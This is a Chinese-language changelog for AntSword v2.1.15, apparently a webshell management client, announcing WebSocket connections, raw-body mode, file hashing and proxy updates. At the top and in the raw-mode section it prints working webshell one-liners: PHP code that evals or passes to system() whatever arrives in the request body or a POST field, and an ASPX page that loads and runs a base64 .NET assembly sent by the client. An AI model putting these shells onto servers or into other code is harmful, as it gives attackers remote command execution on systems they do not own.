AntSword v2.1.15 更新汇总

<?php  eval(file_get_contents("php://input")); ?>

<%@ Page Language="c#"%><%  String Payload = Request.Form["ant"];  if (Payload != null)  {    System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));    assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);  }%>

<?php system($_POST["ant"]);?>

• ❗❗❗支持 WebSocket 连接

  由于 ASP/ASPX/ASPXCharp/PHP/JSP/CUSTOM 类型每次请求时为多个参数，WebSocket连接之后Server端解析会较为困难，所以当前仅支持「RAW」类型: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」,未来会支持基于 defineClass 的 JSPRAW 类型

以 wsMemShell(https://github.com/veo/wsMemShell) 项目中的 wscmd 为例:

URL: ws://127.0.0.1:8080/demoendpointPWD: 随便填写连接类型: CMDLinuxEncoder: default (明文, 这个是WebShell端决定的)Decoder: 根据情况自由选择

注意: 由于 antSword 历史设计原因，WebSocket 连接方式暂时只能每次操作都重新建立一次连接，在传输结束后自动与Server端断开

• 支持自定义 Content-Type, 默认是 form

superagent 支持的 type 简写如下, 当然也支持填写全称:

html: 'text/html',json: 'application/json',xml: 'text/xml',urlencoded: 'application/x-www-form-urlencoded',form: 'application/x-www-form-urlencoded',form-data: 'application/x-www-form-urlencoded'

• Fix #307

• 重新规整 modules/request.js 代码结构

• 调整 superagent ignoreHTTPS 注入,避免 npm upgrade之后引发问题

• 优化了编辑 Shell 信息时，URL后缀发生改变后联动修改「连接类型」功能
• 优化插件快捷设置, 修正过多快捷设置后对UI影响(Fix #303). 现在最多可设置 8 个常用插件
• ❗❗❗新增配置选项「Body 设置为 RAW 模式」

勾选该选项后，只会发送 pwd 键下的内容，不会发送键名（也就是口语中的密码）

目前生效的类型有: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」

主要使用的场景如下， 具体有何不同请抓包自行观察:

// 连接类型 CMDLinux, 编码器选择 default 明文// 其它设置里 勾选「Body 设置为 RAW 模式」后可连接<?php system(file_get_contents("php://input"));?>// 与上面作对比// 连接类型 CMDLinux, 密码填 ant, 编码器选择 default 明文<?php system($_POST["ant"]);?>

值得一提的是，ws:// wss:// 这类 WebSocket 连接会自动启用该选项

• ❗新增 FileHash 计算目标文件 hash 功能

  该功能目前正在逐步适配所有类型中 , 目前已经适配 PHP/PHP4/PSWindows/CMDLinux/JSP/JSPJS

• 优化了新增Core类型时，编码设置解析逻辑, 现在不需要再改该模块的源代码了

• ❗优化全局代理设置, 代理在设置完后不需要再重启了

• 更新纯真IP数据库为 2022/04/20 (https://github.com/out0fmemory/qqwry.dat)

• 升级 superagent 到 6.1.0 (再高的版本需要高版本Electron支持)

• 升级 superagent-proxy 到 v3.0.0

长按关注